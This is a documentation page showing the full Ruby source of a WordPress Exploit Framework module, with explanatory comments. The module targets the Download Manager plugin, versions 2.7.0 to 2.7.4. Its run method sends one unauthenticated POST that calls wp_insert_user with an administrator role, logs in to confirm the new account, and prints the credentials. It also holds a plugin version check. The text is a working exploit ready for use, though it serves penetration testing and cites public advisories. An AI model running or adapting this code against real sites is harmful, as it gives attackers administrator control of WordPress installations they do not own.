class Wpxf::Auxiliary::DownloadManagerPrivilegeEscalation
Public Class Methods
new()
Calls superclass method
Wpxf::Module::new
# File lib/wpxf/modules/auxiliary/priv_esc/download_manager_privilege_escalation.rb, line 9
#
# Sets up the module: calls the superclass initializer, publishes the
# module metadata through +update_info+ and registers the two string
# options ('username' and 'password') that the rest of the module reads.
#
# Both option defaults are computed here, when the instance is built, so
# each new instance gets its own generated values unless they are overridden.
def initialize
  super

  credits = [
    'Mickael Nadeau', # Vulnerability discovery
    'rastating'       # WPXF module
  ]
  advisories = [
    ['EDB', '35533'],
    ['WPVDB', '7706']
  ]

  update_info(
    name: 'Download Manager Privilege Escalation',
    desc: 'The Download Manager plugin, in versions 2.7.0 to 2.7.4, '\
          'allows unauthenticated users to create new admin users '\
          'due to lack of validation wpdm_ajax_call_exec.',
    author: credits,
    references: advisories,
    date: 'Dec 3 2014'
  )

  # Default account name: Utility::Text.rand_alpha(10)
  # (presumably a 10-character random alphabetic string; confirm in Utility::Text).
  username_option = StringOption.new(
    name: 'username',
    desc: 'The username to register with',
    default: Utility::Text.rand_alpha(10)
  )

  # Default password: same helper, with a length drawn from 10..20.
  password_option = StringOption.new(
    name: 'password',
    desc: 'The password to register with',
    default: Utility::Text.rand_alpha(rand(10..20))
  )

  register_options([username_option, password_option])
end
Public Instance Methods
check()
# File lib/wpxf/modules/auxiliary/priv_esc/download_manager_privilege_escalation.rb, line 50
#
# Version check for the 'download-manager' plugin, delegated to
# +check_plugin_version_from_readme+; whatever that helper returns is
# returned unchanged.
#
# The module description lists 2.7.0 to 2.7.4 as the affected range, so the
# two version arguments are presumably (first unaffected, first affected);
# confirm the argument order against the helper.
def check
  plugin_slug = 'download-manager'
  upper_bound = '2.7.5'
  lower_bound = '2.7.0'
  check_plugin_version_from_readme(plugin_slug, upper_bound, lower_bound)
end
password()
# File lib/wpxf/modules/auxiliary/priv_esc/download_manager_privilege_escalation.rb, line 46
#
# Reads the 'password' option through +normalized_option_value+ and
# returns the result as-is.
def password
  option_name = 'password'
  normalized_option_value(option_name)
end
run()
Calls superclass method
Wpxf::Module#run
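# File lib/wpxf/modules/auxiliary/priv_esc/download_manager_privilege_escalation.rb, line 58
#
# Sends the account-creation request and then confirms the outcome by
# logging in with the same credentials.
#
# The request is a single POST to +full_uri+ whose body carries
# 'action' => 'wpdm_ajax_call', 'execute' => 'wp_insert_user' and
# 'role' => 'administrator'. That parameter combination is what the request
# looks like in server-side logs. The module description lists plugin
# versions 2.7.0 to 2.7.4 as affected.
#
# @return [Boolean] false when the superclass +run+ fails, when no response
#   (or a timed-out one) comes back, or when the login check fails; true
#   when the login with the new credentials succeeds.
def run
  return false unless super

  emit_info 'Creating new admin user...'
  res = execute_post_request(
    url: full_uri,
    body: {
      'action' => 'wpdm_ajax_call',
      'execute' => 'wp_insert_user',
      'user_login' => username,
      'user_pass' => password,
      'role' => 'administrator'
    }
  )

  # This guard has to run before res is dereferenced. Previously it sat
  # after an if/else in which both branches returned, so it was unreachable
  # and a missing response raised NoMethodError on res.code instead.
  if res.nil? || res.timed_out?
    emit_error 'No response from the target'
    return false
  end

  # The second argument is presumably a "verbose only" flag; confirm in emit_info.
  emit_info "Response code: #{res.code}", true
  emit_info "Response body: #{res.body}", true

  emit_info 'Verifying new account...'
  unless wordpress_login(username, password)
    emit_error 'Failed to create new user'
    return false
  end

  # The password is written to the tool output in clear text here, so
  # captured output and logs hold a live credential.
  emit_success "User #{username} with password #{password} successfully created"
  true
end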
uploads_url()
# File lib/wpxf/modules/auxiliary/priv_esc/download_manager_privilege_escalation.rb, line 54
#
# Joins the site's wp-content URL (from +wordpress_url_wp_content+) with
# 'uploads' and 'download-manager-files' via +normalize_uri+ and returns
# the result. None of the other methods shown for this class call it.
def uploads_url
  content_root = wordpress_url_wp_content
  normalize_uri(content_root, 'uploads', 'download-manager-files')
end
username()
# File lib/wpxf/modules/auxiliary/priv_esc/download_manager_privilege_escalation.rb, line 42
#
# Reads the 'username' option through +normalized_option_value+ and
# returns the result as-is.
def username
  option_name = 'username'
  normalized_option_value(option_name)
end